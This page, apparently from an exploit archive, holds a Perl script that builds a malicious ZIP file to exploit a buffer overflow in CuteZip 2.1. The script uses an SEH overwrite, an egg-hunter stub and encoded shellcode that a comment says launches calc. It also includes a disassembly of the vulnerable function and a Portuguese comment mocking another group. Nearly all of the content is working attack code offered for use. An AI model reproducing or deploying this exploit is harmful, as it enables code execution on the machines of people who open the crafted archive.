what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CuteZip 2.1 Buffer Overflow

CuteZip 2.1 Buffer Overflow
Posted Feb 14, 2011
Authored by C4SS!0 G0M3S

CuteZip version 2.1 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | fdc63e640a5ce9db1fe646177babef5bf882cebe251aa16de41fd10d4dd3af22

CuteZip 2.1 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl
#
#[+]Exploit Title: Exploit Buffer Overflow CuteZip 2.1
#[+]Date: 02\12\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.globalscape.com/files/cutezip20b.exe
#[+]Version: 2.1 build 9.24.1
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
# Comment in Brazilian Portuguese
# ||
# ||
# \/
#
#Comentario para quem é do Brasil:
#
#Ola Lammers Brasileiros Copiando Receitas de Bolos na internet né,
#Um Bando de Lammers que dizem ser o Metasploit Brazil
#Caras Voces Nao sabem nem Programar em ruby,perl,python,c ou java
#Estude muito,nao suje o no do Metasploit.
#
#Esse Recado foi para o Metasploit Brasil se tiver Achando Ruim
#Me Contate por E-mail.
#
#
#
#Comment:
#
# The structure of this exploit has zip Copied exploits of the team Corelan
# Link: http://www.exploit-db.com/exploits/11764/
#
#
# Vulnerable function
# ||
# ||
# \/
#
# 0x0047CC0E .^72 CC JB SHORT CuteZip.0047CBDC
# 0x0047CC10 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC12 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC19 8D49 00 LEA ECX,DWORD PTR DS:[ECX]
# 0x0047CC1C > 23D1 AND EDX,ECX
# 0x0047CC1E . 8A06 MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC20 . 8807 MOV BYTE PTR DS:[EDI],AL
# 0x0047CC22 . 8A46 01 MOV AL,BYTE PTR DS:[ESI+1]
# 0x0047CC25 . C1E9 02 SHR ECX,2
# 0x0047CC28 . 8847 01 MOV BYTE PTR DS:[EDI+1],AL
# 0x0047CC2B . 83C6 02 ADD ESI,2
# 0x0047CC2E . 83C7 02 ADD EDI,2
# 0x0047CC31 . 83F9 08 CMP ECX,8
# 0x0047CC34 .^72 A6 JB SHORT CuteZip.0047CBDC
# 0x0047CC36 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> ===> //Here is the function that occurs Buffer Overflow
# 0x0047CC38 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC3F 90 NOP
# 0x0047CC40 > 23D1 AND EDX,ECX
# 0x0047CC42 . 8A06 MOV AL,BYTE PTR DS:[ESI]
# 0x0047CC44 . 8807 MOV BYTE PTR DS:[EDI],AL
# 0x0047CC46 . 46 INC ESI
# 0x0047CC47 . C1E9 02 SHR ECX,2
# 0x0047CC4A . 47 INC EDI
# 0x0047CC4B . 83F9 08 CMP ECX,8
# 0x0047CC4E .^72 8C JB SHORT CuteZip.0047CBDC
# 0x0047CC50 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
# 0x0047CC52 . FF2495 C8CC470>JMP DWORD PTR DS:[EDX*4+47CCC8]
# 0x0047CC59 8D49 00 LEA ECX,DWORD PTR DS:[ECX]
#
#
#
#
#
#
#


use IO::File;

if($^O=="windows")
{
system("cls");
system("color 4f");
}
else
{
system("clear");
}


sub banner
{
print q{

[+]Exploit: Exploit Buffer Overflow CuteZip 2.1
[+]Date: 02\\12\\2011
[+]Author: C4SS!0 G0M3S
[+]Home: www.invasao.com.br
[+]E-mail: Louredo_@hotmail.com
[+]Version: 2.1 build 9.24.1
[+]Thanks: Corelan Team, Skylined
[+]Impact: Hich

};
}
my $file = $ARGV[0];


if($#ARGV!=0)
{
banner;
print "[-]Usage: $0 <File Name>\n";
print "[-]Exemple: $0 Exploit.zip\n";

exit(0);
}
banner;

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

my $payload = "\x41" x 1148;
my $nseh = "\xeb\x07\x90\x90";
my $seh = pack('V',0x0040112F);

my $egg = "\x41" x 2;
$egg .= "\x61\x61\x61\x51\x58\xFF\xD0";

my $shellcode = "\x41" x 123;

print "[*]Identifying the length Shellcode\n";
sleep(1);

$shellcode = $shellcode.
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L".
"41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912".
"6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0);
"KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL".
"VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK".
"HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB".
"K4BX0S5LKNQX14OM8646B9CZOA";

print "[*]The length is Shellcode:".(length($shellcode)-123)."\n";
sleep(1);

my $junk = "\x42" x (4064-length($payload.$nseh.$seh.$egg.$shellcode));

$payload = $payload.$nseh.$seh.$egg.$shellcode.$junk;

$payload = $payload.".txt";
my $Exploit = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;
print "[*]Creating the file $file\n";
sleep(1);

open(f,">$file")|| die("Error:\n$!\n");
print f $Exploit;
close(f);
print "[*]The File $file Created Successfully\n";
sleep(1);


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close